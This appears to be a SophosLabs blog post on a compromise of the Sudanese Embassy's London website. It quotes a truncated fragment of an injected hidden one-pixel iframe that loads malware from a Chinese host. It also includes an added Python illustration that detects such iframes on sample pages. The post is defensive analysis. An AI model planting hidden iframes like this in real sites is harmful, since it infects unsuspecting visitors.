YAE: Yet Another Embassy -- The Republic of Sudan in London

Filed Under: Malware, SophosLabs


Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release headings were strange:-

  • Who is Blackmailing Whom?
  • ICC - Europe's Guantanamo?
  • Sudan and ICC
  • National Elections Commission


The suggestion that the International Criminal Court was like Guantanamo was not something I had heard before. So I went to the WHOIS of the site to see who owned the site:

Registrant's address:
60 Chambers Lane
London
NW10 2RL
United Kingdom

NW10 stands for the postcode area North West 10, i.e. Willesden Green. Not where you would traditionally think of embassies being based in London.

The contact details were correct though:-

Embassy of the Republic of the Sudan
3 Cleveland Row
St. James's
London
SW1A 1DD

Curiouser and curiouser. Looking through search engine results for the site, it appears that the site really is that of the Embassy of Sudan in London!

So why had the site come up in the queues?

Well it contains an iframe with the following code:

.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">

This malicious iframe is just one pixel square and hidden from view; it downloads further malware from a Chinese website.
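As an added illustration (not code from the original post), a small Python check for the pattern described above: an iframe that is tiny and/or hidden via CSS and points at a host other than the site's own. It runs over a constructed page fragment; the hostnames are placeholders, not the real domains.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics mirroring the injected tag described in the post: a 1x1 (or
# smaller) iframe, hidden with CSS, whose src points at a third-party host.
SIZE_LIMIT = 2
HIDE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def _dim(value):
    """Parse a width/height attribute such as '1', '1px' or '0'; None if unparsable."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None

class IframeAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        if w is not None and h is not None and w <= SIZE_LIMIT and h <= SIZE_LIMIT:
            reasons.append("tiny (%dx%d)" % (w, h))
        if HIDE_RE.search(a.get("style", "")):
            reasons.append("hidden via CSS")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("third-party host %s" % host)
        if len(reasons) >= 2:  # one signal alone is common on legitimate pages
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})

def audit_page(html, site_host):
    """Return the list of suspicious iframes found in the page source."""
    p = IframeAuditor(site_host)
    p.feed(html)
    return p.findings

# Constructed sample: one ordinary embed plus an injected tag modelled on the
# post's description (placeholder hostnames under the reserved .invalid TLD).
SAMPLE = """<html><body>
<iframe src="https://www.embassy-site.invalid/map" width="400" height="300"></iframe>
<iframe src="http://dropper-host.invalid/in.cgi?id1000" width=1 height=1 style="visibility: hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE, "www.embassy-site.invalid"):
        print(f["src"], "->", ", ".join(f["reasons"]))
```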

Like other embassies that have been hit (India's, for example), the Sudanese haven't been targeted deliberately but are victims of poor security.
